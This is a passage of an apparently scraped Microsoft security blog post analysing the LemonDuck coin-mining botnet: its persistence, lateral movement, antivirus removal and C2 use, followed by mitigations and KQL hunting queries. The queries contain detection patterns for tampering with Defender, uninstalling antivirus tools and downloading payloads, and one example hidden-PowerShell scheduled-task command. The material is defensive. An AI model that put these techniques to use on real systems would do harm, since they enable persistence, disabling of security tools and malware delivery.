\u2013 is generally much more likely to begin with or lead to human-operated activity. These activities always result in more invasive secondary malware being delivered in tandem with persistent access being maintained through backdoors. These human-operated activities result in greater impact than standard infections.\n\nIn March and April 2021, various vulnerabilities related to the [ProxyLogon](<https://security.microsoft.com/threatanalytics3/4ef1fbc5-5659-4d9b-b32e-97a694475955/overview>) set of Microsoft Exchange Server exploits were utilized by LemonDuck to install web shells and gain access to outdated systems. Attackers then used this access to launch additional attacks while also deploying automatic LemonDuck components and malware.\n\nIn some cases, the LemonDuck attackers used renamed copies of the official Microsoft Exchange On-Premises Mitigation Tool to remediate the vulnerability they had used to gain access. They did so while maintaining full access to compromised devices and limiting other actors from abusing the same Exchange vulnerabilities.\n\nThis self-patching behavior is in keeping with the attackers\u2019 general desire to remove competing malware and risks from the device. This allows them to limit visibility of the attack to SOC analysts within an organization who might be prioritizing unpatched devices for investigation, or who would overlook devices that do not have a high volume of malware present.\n\nThe LemonDuck operators also make use of many [fileless malware techniques](<https://www.microsoft.com/security/blog/2018/01/24/now-you-see-me-exposing-fileless-malware/#:~:text=%20These%20techniques%20include%3A%20%201%20Reflective%20DLL,provide%20powerful%20means%20for%20delivering%20memory-only...%20More%20>), which can make remediation more difficult. Fileless techniques, which include persistence via registry, scheduled tasks, WMI, and startup folder, remove the need for stable malware presence in the filesystem. These techniques also include utilizing process injection and in-memory execution, which can make removal non-trivial. It is therefore imperative that organizations that were vulnerable in the past also direct action to investigate exactly how patching occurred, and whether malicious activity persists.\n\nOn the basic side of implementation this can mean registry, scheduled task, WMI and startup folder persistence to remove the necessity for stable malware presence in the filesystem. However, many free or easily available RATs and Trojans are now routinely utilizing process injection and in-memory execution to circumvent easy removal. To rival these kinds of behaviors it\u2019s imperative that security teams within organizations review their incident response and malware removal processes to include all common areas and arenas of the operating system where malware may continue to reside after cleanup by an antivirus solution.\n\n## General, automatic behavior\n\nIf the initial execution begins automatically or from self-spreading methods, it typically originates from a file called _Readme.js_. This behavior could change over time, as the purpose of this .js file is to obfuscate and launch the PowerShell script that pulls additional scripts from the C2. This JavaScript launches a CMD process that subsequently launches Notepad as well as the PowerShell script contained within the JavaScript.\n\nIn contrast, if infection begins with RDP brute force, Exchange vulnerabilities, or other vulnerable edge systems, the first few actions are typically human-operated or originate from a hijacked process rather than from _Readme.js_. After this, the next few actions that the attackers take, including the scheduled task creation, as well as the individual components and scripts are generally the same.\n\nOne of these actions is to establish fileless persistence by creating scheduled tasks that re-run the initial PowerShell download script. This script pulls its various components from the C2s at regular intervals. The script then checks to see if any portions of the malware were removed and re-enables them. LemonDuck also maintains a backup persistence mechanism through WMI Event Consumers to perform the same actions.\n\nTo host their scripts, the attackers use multiple hosting sites, which as mentioned are resilient to takedown. They also have multiple scheduled tasks to try each site, as well as the WMI events in case other methods fail. If all of those fail, LemonDuck also uses its access methods such as RDP, Exchange web shells, Screen Connect, and RATs to maintain persistent access. These task names can vary over time, but \u201cblackball\u201d, \u201cblutea\u201d, and \u201crtsa\u201d have been persistent throughout 2020 and 2021 and are still seen in new infections as of this report.\n\nLemonDuck attempts to automatically disable Microsoft Defender for Endpoint real-time monitoring and adds whole disk drives \u2013 specifically the _C:\\_ drive \u2013 to the Microsoft Defender exclusion list. This action could in effect disable Microsoft Defender for Endpoint, freeing the attacker to perform other actions. [Tamper protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) prevents these actions, but it\u2019s important for organizations to monitor this behavior in cases where individual users set their own exclusion policy.\n\nLemonDuck then attempts to automatically remove a series of other security products through _CMD.exe_, leveraging _WMIC.exe_. The products that we have observed LemonDuck remove include ESET, Kaspersky, Avast, Norton Security, and MalwareBytes. However, they also attempt to uninstall any product with \u201cSecurity\u201d and \u201cAntiVirus\u201d in the name by running the following commands:\n\n\n\nCustom detections in Microsoft Defender for Endpoint or other security solutions can raise alerts on behaviors indicating interactions with security products that are not deployed in the environment. These alerts can allow the quick isolation of devices where this behavior is observed. While this uninstallation behavior is common in other malware, when observed in conjunction with other LemonDuck TTPs, this behavior can help validate LemonDuck infections.\n\nLemonDuck leverages a wide range of free and open-source penetration testing tools. It also uses freely available exploits and functionality such as coin mining. Because of this, the order and the number of times the next few activities are run can change. The attackers can also change the threat\u2019s presence slightly depending on the version, the method of infection, and timeframe. Many .exe and .bin files are downloaded from C2s via encoded PowerShell commands. These domains use a variety names such as the following:\n\n * ackng[.]com\n * bb3u9[.]com\n * ttr3p[.]com\n * zz3r0[.]com\n * sqlnetcat[.]com\n * netcatkit[.]com\n * hwqloan[.]com\n * 75[.]ag\n * js88[.]ag\n * qq8[.]ag\n\nIn addition to directly calling the C2s for downloads through scheduled tasks and PowerShell, LemonDuck exhibits another unique behavior: the IP addresses of a smaller subset of C2s are calculated and paired with a previously randomly generated and non-real domain name. This information is then added into the Windows Hosts file to avoid detection by static signatures. In instances where this method is seen, there is a routine to update this once every 24 hours. An example of this is below:\n\n\n\nLemonDuck is known to use custom executables and scripts. It also renames and packages well-known tools such as XMRig and Mimikatz. Of these, the three most common are the following, though other packages and binaries have been seen as well, including many with _.ori_ file extensions:\n\n * _IF.BIN _(used for lateral movement and privilege escalation)\n * _KR.BIN _(used for competition removal and host patching)\n * _M[0-9]{1}[A-Z]{1}.BIN, M6.BIN, M6.BIN.EXE, or M6G.Bin_ (used for mining)\n\nExecutables used throughout the infection also use random file names sourced from the initiating script, which selects random characters, as evident in the following code:\n\n\n\n## Lateral movement and privilege escalation\n\n_IF.Bin_, whose name stands for \u201cInfection\u201d, is the most common name used for the infection script during the download process. LemonDuck uses this script at installation and then repeatedly thereafter to attempt to scan for ports and perform network reconnaissance. It then attempts to log onto adjacent devices to push the initial LemonDuck execution scripts.\n\n_IF.Bin_ attempts to move laterally via any additional attached drives. When drives are identified, they are checked to ensure that they aren\u2019t already infected. If they aren\u2019t, a copy of _Readme.js_, as well as subcomponents of _IF.Bin_, are downloaded into the drive\u2019s home directory as hidden.\n\nSimilarly, _IF.Bin_ attempts to brute force and use vulnerabilities for SMB, SQL, and other services to move laterally. It then immediately contacts the C2 for downloads.\n\nAnother tool dropped and utilized within this lateral movement component is a bundled Mimikatz, within a _mimi.dat_ file associated with both the \u201cCat\u201d and \u201cDuck\u201d infrastructures. This tool\u2019s function is to facilitate credential theft for additional actions. In conjunction with credential theft, _IF.Bin_ drops additional .BIN files to attempt common service exploits like CVE-2017-8464 (LNK remote code execution vulnerability) to increase privilege.\n\nThe attackers regularly update the internal infection components that the malware scans for. They then attempt brute force or spray attacks, as well as exploits against available SSH, MSSQL, SMB, Exchange, RDP, REDIS and Hadoop YARN for Linux and Windows systems. A sample of ports that recent LemonDuck infections were observed querying include 70001, 8088, 16379, 6379, 22, 445, and 1433.\n\nOther functions built in and updated in this lateral movement component include mail self-spreading. This spreading functionality evaluates whether a compromised device has Outlook. If so, it accesses the mailbox and scans for all available contacts. It sends the initiating infecting file as part of a .zip, .js, or .doc/.rtf file with a static set of subjects and bodies. The mail metadata count of contacts is also sent to the attacker, likely to evaluate its effectiveness, such as in the following command:\n\n\n\n## Competition removal and host patching\n\nAt installation and repeatedly afterward, LemonDuck takes great lengths to remove all other botnets, miners, and competitor malware from the device. It does this via _KR.Bin_, the \u201cKiller\u201d script, which gets its name from its function calls. This script attempts to remove services, network connections, and other evidence from dozens of competitor malware via scheduled tasks. It also closes well-known mining ports and removes popular mining services to preserve system resources. The script even removes the mining service it intends to use and simply reinstalls it afterward with its own configuration.\n\nThis \u201cKiller\u201d script is likely a continuation of older scripts that were used by other botnets such as GhostMiner in 2018 and 2019. The older variants of the script were quite small in comparison, but they have since grown, with additional services added in 2020 and 2021. Presently, LemonDuck seems consistent in naming its variant _KR.Bin_. This process spares the scheduled tasks created by LemonDuck itself, including various PowerShell scripts as well as a task called \u201cblackball\u201d, \u201cblutea\u201d, or \u201crtsa\u201d, which has been in use by all LemonDuck\u2019s infrastructures for the last year along with other task names.\n\nThe attackers were also observed manually re-entering an environment, especially in instances where edge vulnerabilities were used as an initial entry vector. The attackers also patch the vulnerability they used to enter the network to prevent other attackers from gaining entry. As mentioned, the attackers were seen using a copy of a Microsoft-provided mitigation tool for Exchange ProxyLogon vulnerability, which they hosted on their infrastructure, to ensure other attackers don\u2019t gain web shell access the way they had. If unmonitored, this scenario could potentially lead to a situation where, if a system does not appear to be in an unpatched state, suspicious activity that occurred before patching could be ignored or thought to be unrelated to the vulnerability.\n\n## Weaponization and continued impact\n\nA miner implant is downloaded as part of the monetization mechanism of LemonDuck. The implant used is usually XMRig, which is a favorite of GhostMiner malware, the [Phorpiex botnet](<https://www.microsoft.com/security/blog/2021/05/20/phorpiex-morphs-how-a-longstanding-botnet-persists-and-thrives-in-the-current-threat-environment/>), and other malware operators. The file uses any of the following names:\n\n * _M6.bin_\n * _M6.bin.ori_\n * _M6G.bin_\n * _M6.bin.exe_\n * _<File name that follows the regex pattern M[0-9]{1}[A-Z]{1}>.BIN._\n\nOnce the automated behaviors are complete, the threat goes into a consistent check-in behavior, simply mining and reporting out to the C2 infrastructure and mining pools as needed with encoded PowerShell commands such as those below (decoded):\n\n\n\nOther systems that are affected bring in secondary payloads such as Ramnit, which is a very popular Trojan that has been seen being dropped by other malware in the past. Additional backdoors, other malware implants, and activities continuing long after initial infection, demonstrating that even a \u201csimple\u201d infection by a coin mining malware like LemonDuck can persist and bring in more dangerous threats to the enterprise.\n\n## Comprehensive protection against a wide-ranging malware operation\n\nThe cross-domain visibility and coordinated defense delivered by [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. Below we list mitigation actions, detection information, and advanced hunting queries that Microsoft 365 Defender customers can use to harden networks against threats from LemonDuck and other malware operations.\n\n### Mitigations\n\nApply these mitigations to reduce the impact of LemonDuck. Check the recommendations card for the deployment status of monitored mitigations.\n\n * Prevent threats from arriving via removable storage devices by blocking these devices on sensitive endpoints. If you allow removable storage devices, you can minimize the risk by turning off autorun, enabling real-time antivirus protection, and blocking untrusted content. [Learn about stopping threats from USB devices and other removable media](<https://docs.microsoft.com/windows/security/threat-protection/device-control/control-usb-devices-using-intune>).\n * Ensure that Linux and Windows devices are included in routine patching, and validate protection against the CVE-2019-0708, CVE-2017-0144, CVE-2017-8464, CVE-2020-0796, CVE-2021-26855, CVE-2021-26858, and CVE-2021-27065 vulnerabilities, as well as against brute-force attacks in popular services like SMB, SSH, RDP, SQL, and others.\n * [Turn on PUA protection](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/detect-block-potentially-unwanted-apps-windows-defender-antivirus>). Potentially unwanted applications (PUA) can negatively impact machine performance and employee productivity. In enterprise environments, PUA protection can stop adware, torrent downloaders, and coin miners.\n * Turn on [tamper protection features](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-antivirus/prevent-changes-to-security-settings-with-tamper-protection>)to prevent attackers from stopping security services.\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-antivirus/enable-cloud-protection-microsoft-defender-antivirus>)and automatic sample submission on Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.\n * Encourage users to use Microsoft Edge and other web browsers that support SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that contain exploits and host malware. [Turn on network protection](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/enable-network-protection>)to block connections to malicious domains and IP addresses.\n * Check your [Office 365 antispam policy](<https://docs.microsoft.com/microsoft-365/security/office-365-security/configure-your-spam-filter-policies>)and your [mail flow rules](<https://docs.microsoft.com/microsoft-365/security/office-365-security/create-safe-sender-lists-in-office-365#recommended-use-mail-flow-rules>) for allowed senders, domains and IP addresses. [Apply extra caution](<https://docs.microsoft.com/exchange/troubleshoot/antispam/cautions-against-bypassing-spam-filters>) when using these settings to bypass antispam filters, even if the allowed sender addresses are associated with trusted organizations\u2014Office 365 will honor these settings and can let potentially harmful messages pass through. [Review system overrides in threat explorer](<https://docs.microsoft.com/microsoft-365/security/office-365-security/threat-explorer#system-overrides>) to determine why attack messages have reached recipient mailboxes.\n\n### Attack surface reduction\n\nTurn on the following attack surface reduction rules, to block or audit activity associated with this threat:\n\n * [Block executable content from email client and webmail](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-executable-content-from-email-client-and-webmail>)\n * [Block JavaScript or VBScript from launching downloaded executable content](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-javascript-or-vbscript-from-launching-downloaded-executable-content>)\n * [Block Office applications from creating executable content](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-office-applications-from-creating-executable-content>)\n * [Block all office applications from creating child processes](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-all-office-applications-from-creating-child-processes>)\n * [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion>)\n * [Block execution of potentially obfuscated scripts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-execution-of-potentially-obfuscated-scripts>)\n * [Block persistence through WMI event subscription](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-persistence-through-wmi-event-subscription>)\n * [Block process creations originating from PSExec and WMI commands](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-process-creations-originating-from-psexec-and-wmi-commands>)\n\n### Antivirus detections\n\nMicrosoft Defender Antivirus detects threat components as the following malware:\n\n * TrojanDownloader:PowerShell/LemonDuck!MSR\n * TrojanDownloader:Linux/LemonDuck.G!MSR\n * Trojan:Win32/LemonDuck.A\n * Trojan:PowerShell/LemonDuck.A\n * Trojan:PowerShell/LemonDuck.B\n * Trojan:PowerShell/LemonDuck.C\n * Trojan:PowerShell/LemonDuck.D\n * Trojan:PowerShell/LemonDuck.E\n * Trojan:PowerShell/LemonDuck.F\n * Trojan:PowerShell/LemonDuck.G\n * TrojanDownloader:PowerShell/LodPey.A\n * TrojanDownloader:PowerShell/LodPey.B\n * Trojan:PowerShell/Amynex.A\n * Trojan:Win32/Amynex.A\n\n### Endpoint detection and response (EDR) alerts\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * LemonDuck botnet C2 domain activity\n * LemonDuck malware\n\nThe following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.\n\n * Suspicious PowerShell command line\n * Suspicious remote activity\n * Suspicious service registration\n * Suspicious Security Software Discovery\n * Suspicious System Network Configuration Discovery\n * Suspicious sequence of exploration activities\n * Suspicious Process Discovery\n * Suspicious System Owner/User Discovery\n * Suspicious System Network Connections Discovery\n * Suspicious Task Scheduler activity\n * Suspicious Microsoft Defender Antivirus exclusion\n * Suspicious behavior by cmd.exe was observed\n * Suspicious remote PowerShell execution\n * Suspicious behavior by svchost.exe was observed\n * A WMI event filter was bound to a suspicious event consumer\n * Attempt to hide use of dual-purpose tool\n * System executable renamed and launched\n * Microsoft Defender Antivirus protection turned off\n * Anomaly detected in ASEP registry\n * A script with suspicious content was observed\n * An obfuscated command line sequence was identified\n * A process was injected with potentially malicious code\n * A malicious PowerShell Cmdlet was invoked on the machine\n * Suspected credential theft activity\n * Outbound connection to non-standard port\n * Sensitive credential memory read\n\n### Advanced hunting\n\nThe LemonDuck botnet is highly varied in its payloads and delivery methods after email distribution so can sometimes evade alerts. You can use the advanced hunting capability in Microsoft 365 Defender and Microsoft Defender for Endpoint to surface activities associated with this threat.\n\n**NOTE:** The following sample queries lets you search for a week's worth of events. To explore up to 30 days worth of raw data to inspect events in your network and locate potential Lemon Duck-related indicators for more than a week, go to the **Advanced Hunting** page > **Query** tab, select the calendar drop-down menu to update your query to hunt for the **Last 30 days**.\n\n**LemonDuck template subject lines**\n\nLooks for subject lines that are present from 2020 to 2021 in dropped scripts that attach malicious LemonDuck samples to emails and mail it to contacts of the mailboxes on impacted machines. Additionally, checks if Attachments are present in the mailbox. General attachment types to check for at present are .DOC, .ZIP or .JS, though this could be subject to change as well as the subjects themselves. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAG2RQUvDQBCF31nwP-ytCnroUUElxEoEUUirxWOiXRuNicSkpeCP99vJepESZnYz8-a9mdmZPlWoUq2ZNlqpUa9vHepAP3Laak2sw5zmGlTqnfsLGEdNgz_SRAtDOc4OTM-fUyuPT_WgJ93qWqea6gzsCfY_6mBKqdiYypcpVHRVRxVPzmmpjLqRIVOiO_Qy4gk8gW1ONtezzo0_x-7JOcvleiQfasNkE7gWuolcS_otbKI-zuHRH_QR82-ot3olXmpHfox6asJetlhtndbcer6wrxFTcmvhWdmmvG35rz7srGLTLvodyAF82FyHWmC5Ane89y0SUyroc837ja-WGkNjk1zqAj_VLyyp2szeAQAA&runQuery=true&timeRangeId=week>)\n\n`EmailEvents \n| where Subject in ('The Truth of COVID-19','COVID-19 nCov Special info WHO','HALTH ADVISORY:CORONA VIRUS', \n'WTF','What the fcuk','good bye','farewell letter','broken file','This is your order?') \n| where AttachmentCount >= 1`\n\n**LemonDuck Botnet Registration Functions**\n\nLooks for instances of function runs with name \u201cSIEX\u201d, which within the Lemon Duck initializing scripts is used to assign a specific user-agent for reporting back to command-and-control infrastructure with. This query should be accompanied by additional surrounding logs showing successful downloads from component sites. [Run query in Microsfot 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAG2PuwrCQBRETy34D4ufIViID7ATYmFhE9yAAV9oMIgm3-7ZLQRBhvtgmJm7O6fiQc3euXCrONNwZ8iAN4GWg9zNCkxVNWovajY8uWZ2IgIj1vJt1hbZcxQzuZModUQ1_1OjqL_Jpb6le0qIviRd6O3pxoud_Tc1MePcC1b-YZv3zvoA7T5fgtwAAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceEvents \n| where ActionType == \"PowerShellCommand\" \n| where AdditionalFields =~ \"{\\\"Command\\\":\\\"SIEX\\\"}\"`\n\n**LemonDuck keyword identification**\n\nLooks for simple usage of LemonDuck seen keyword variations initiated by PowerShell processes. All results should reflect Lemon_Duck behavior, however there are existing variants of Lemon_Duck that might not use this term explicitly, so validate with additional hunting queries based on known TTPs. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAJ2NQQrCMBBF_1rwDqErBfEGrqyCUKQ3kKLFBpsojdoKHt7nbESX8pnM8P7MT65ad3nt6aU6nW1KaAWvFXVlHmukp5x6NbCOctrgeVyvyt6o40_CGtoyb9kIdrNATpkubPWWlCyxRXP6QGV__rZkDqjCO6iwnfdlA0naGX9oQn4BD2xHaK4bCSfo7Mv58Klezaq6iiQBAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"powershell.exe\" \n| where InitiatingProcessCommandLine has_any(\"Lemon_Duck\",\"LemonDuck\")`\n\n**LemonDuck Microsoft Defender tampering**\n\nLooks for a command line event where LemonDuck or other like malware might attempt to modify Defender by disabling real-time monitoring functionality or adding entire drive letters to the exclusion criteria. The exclusion additions will often succeed even if tamper protection is enabled due to the design of the application. Custom alerts could be created in an environment for particular drive letters common in the environment. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWRzQqCQBSFzzroHcRVgT1EpIugIKp9mFoappL9LXr4vhkNrJUQl5m53jPnnOsdX4nuyhRxrnRRabOaCKgnKnQldzTUQC_Oh1KqF5ajOWgGnim0e6Hjj8aM_EyEYLEW9o5hplRq7dhzwtFIrjYgV020VGVVEh1ap8LqufK46cpHpYa5h5lozTIqxv9MvsSx6aqE2_T0YU7pIe7hEOjJd64bPpnV-_4rV-PORCqLncAiXJ1eE_D-mJ7h-p1Xm4OZ2radQI1aSFbpDTwRAUzcAQAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessCommandLine has_all (\"Set-MpPreference\", \"DisableRealtimeMonitoring\", \"Add-MpPreference\", \"ExclusionProcess\") \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Antivirus uninstallation attempts**\n\nLooks for a command line event where LemonDuck or other similar malware might attempt to modify Defender by disabling real-time monitoring functionality or adding entire drive letters to the exclusion criteria. The exclusion additions will often succeed even if tamper protection is enabled due to the design of the application. Custom alerts could be created in an environment for particular drive letters common in the environment. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEALWQzUrEQBCE6yz4DiEnF0SfwIP4A6IsguBVQja4wyaTMBN_FsRn97M2u6LeBBl6plPdVV2dczV6VlDNe6uk3lnmXIA3ihrJ97WnNxV60RIsEYWuqAWqQZXvqMcfCpegLfmcjs6cE71zl-h0nnkE-kqUf5xwRt5xKmoL3bjnk7kEyXrgbjkH6A_mLfQEd_w2p9QhEXceW1RWO7yeNAqY0foZ_gbbdByD9a6MVqw8IfjvlZr922ZRa292bWSwdrbz9eSswkNlv1_fw5Rn-mp2SvaxZTTGt_2n3inonkj05gmf4y1R6akXuvulNNMH1HgRaFYCAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName =~ \"wmic.exe\" \n| where InitiatingProcessCommandLine has_all(\"product where\",\"name like\",\"call uninstall\",\"/nointeractive\") \n| where InitiatingProcessCommandLine has_any(\"Kaspersky\",\"avast\",\"avp\",\"security\",\"eset\",\"AntiVirus\",\"Norton Security\")`\n\n**Known LemonDuck component script installations**\n\nLooks for instances of the callback actions which attempt to obfuscate detection while downloading supporting scripts such as those that enable the \u201cKiller\u201d and \u201cInfection\u201d functions for the malware as well as the mining components and potential secondary functions. Options for more specific instances included to account for environments with potential false positives. Most general versions are intended to account for minor script or component changes such as changing to utilize non .bin files, and non-common components. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAN2QzWrCUBCFz1roO1xctSC60p2rVlEQ8Q0kJrYJJlGS-Ac-vN8dA9rgwm3LMHcm58zPmXxprYMShcSFCm0tK7ER-Fq5KvI3tXSR01ExWIE7TeES2ESBvbl-GhPGoCn5nIrMenyV07va2lF3tFmlzUyxLvGEt9XBQ3qiB-zjqYpXdHySZ1gAF2lmNb43Bim15PXbvaoePQ4uhNuSVcw513oiU5xTvwdNNaxxr7LfqEmJAV-RaQpq9qZjR3_Fjoltj-0yB1Pw-gv__j2e62pluu7X_Z_bNsy83-eRRN8NJNPg1z-4At8RQUloAwAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName in (\"powershell.exe\",\"cmd.exe\") \n| where InitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\") or \nInitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\",\".bin\") or \nInitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\",\"kr.bin\",\"if.bin\",\"m6.bin\")`\n\n**LemonDuck named scheduled creation**\n\nLooks for instances of the LemonDuck creates statically named scheduled tasks or a semi-unique pattern of task creation LemonDuck also utilizes launching hidden PowerShell processes in conjunction with randomly generated task names. An example of a randomly generated one is: "schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn fs5yDs9ArkV\\2IVLzNXfZV/F /tr "powershell -w hidden -c PS_CMD". [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWS0WrCQBBF77PgPyx5UrD6BX3S-mRLwQ8o2ygoGpXdtGlB_PaenSQlFV-kLLO53Jmde3eyM631qa1yvq8KOhqKrCf4tQ4qwX31dJZTpQ1cIJzmnNqDXuRVGPOoC3tGfU5dCR-1I8Zkv4jsZp-_qlNwwfIor7RA42BVG-s2oMeE2nTSo5B6Dv_d9c3476Z7CXZ6526e8zuQB-_Jja7yH-bAX2WCTcybM4duYE8O73WUNG_dt9YKqNc44jxarvjNpj_Q4gKlrsMWzztsaPCJ2spmGG2WyYPTA1xytsXpyt5E4nKb8hKvUz1rZvf9AWK9PVhOAgAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where FileName =~ \"schtasks.exe\" \n| where ProcessCommandLine has(\"/create\") \n| where ProcessCommandLine has_any(\"/tn blackball\",\"/tn blutea\",\"/tn rtsa\") or \nProcessCommandLine has_all(\"/create\",\"/ru\",\"system\",\"/sc\",\"/mo\",\"/tn\",\"/F\",\"/tr\",\"powershell -w hidden -c PS_CMD\")`\n\n**Competition killer script scheduled task execution**\n\nLooks for instances of the LemonDuck component KR.Bin, which is intended to kill competition prior to making the installation and persistence of the malware concrete. The killer script used is based off historical versions from 2018 and earlier, which has grown over time to include scheduled task and service names of various botnets, malware, and other competing services. The version currently in use by LemonDuck has approximately 40-60 scheduled task names. The upper maximum in this query can be modified and adjusted to include time bounding. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAJWRT0_CQBDF35nE79D0BAkRDhw4oBeqCQbUxD_XBguxhlpMW8EaP7y_HQppiATMZmZnZt_MvLwNNNdKb4q475VpaVHOuaI-V6qC-EwN_cjTWjG1DPP20EPid86UjpnGTEwNFVPJFeITTlM-WUS1sPoCOwf3hflqYx0FxAlW1GqPut3F1_jWjlGuz2pvxs5v2-myBVHIq5vTPIlri84XlfigpskIxHaX41mYJrMKteX5zMTEmLj9F5jjk-FLWCTW8woyhsuGU3gip7-U_8-E-g-ksHE_MOHOyTeKPtDnuJZVfme8I2Pt6YZ4hXl60gdzp7V_WaKyf4DjYXUuTZ-euqbSMS0Hhu6D_gUG3Q8GqgIAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where ProcessCommandLine has_all(\"schtasks.exe\",\"/Delete\",\"/TN\",\"/F\") \n| summarize make_set(ProcessCommandLine) by DeviceId \n| extend DeleteVolume = array_length(set_ProcessCommandLine) \n| where set_ProcessCommandLine has_any(\"Mysa\",\"Sorry\",\"Oracle Java Update\",\"ok\") where DeleteVolume >= 40 and DeleteVolume <= 80`\n\n**LemonDuck hosts file adjustment for dynamic C2 downloads**\n\nLooks for a PowerShell event wherein LemonDuck will attempt to simultaneously retrieve the IP address of a C2 and modify the hosts file with the retrieved address. The address is then attributed to a name that does not exist and is randomly generated. The script then instructs the machine to download data from the address. This query has a more general and more specific version, allowing the detection of this technique if other activity groups were to utilize it. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAMWQuwrCYAyFzyz4DqWTgvgGDmK9gYigu5S22IK20op18OH9Erro4OAiIZc_OTknbaRMdxVKyDvVqrxqsDn9TKVu1H319FSgVjm9Gg-0ZlYwLRR7LHX6YFjQPVNvQVx8Z4IFCnUF1TpT44xnbEx-4OGPajPqCxYzS7VxjG3mdBodiaYygH9J_6YV-IY8BZ26irFYDDXCDZN0dd5hbTaE0y6s2PnHXWv432cHNvZs1J3-9_vtHfn_L9Gt0E952_Wxf90Lt1_r6hICAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"powershell.exe\" \n| where InitiatingProcessCommandLine has_all(\"GetHostAddresses\",\"etc\",\"hosts\") \nor InitiatingProcessCommandLine has_all(\"GetHostAddresses\",\"IPAddressToString\",\"etc\",\"hosts\",\"DownloadData\")`\n\n \n\n[Learn how your organization can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>).\n\n \n\nThe post [When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T19:00:59", "type": "mssecure", "title": "When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-8464", "CVE-2019-0708", "CVE-2020-0796", "CVE-2021-26855", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-07-29T19:00:59", "id": "MSSECURE:4A6B394DCAF12E05136AE087248E228C", 